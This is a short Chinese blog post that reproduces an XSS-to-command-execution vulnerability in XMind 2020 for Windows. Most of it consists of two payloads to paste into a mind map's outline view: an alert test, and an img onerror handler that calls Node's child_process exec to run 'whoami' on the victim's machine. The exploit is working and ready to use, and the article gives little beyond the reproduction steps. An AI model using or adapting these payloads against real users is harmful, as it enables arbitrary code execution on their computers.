本文主要是介绍漏洞复现-Xmind-xss致命令执行，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

0x00 实验环境

攻击机：Win 10

0x01 影响版本

官网windows最新版本：XMind-2020-for-Windows-64bit-10.3.1-202101070032

0x02 漏洞复现

（1）安装Xmind后，新建一个思维导图，然后点击大纲：

（2）尝试XSS语句测试payload：（windows版本，选中后点击ctrl即可触发弹框）

<img src=x one rror=alert(1)>

 （3）尝试使用xss进行命令执行：

<img src=x one rror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">

这篇关于漏洞复现-Xmind-xss致命令执行的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！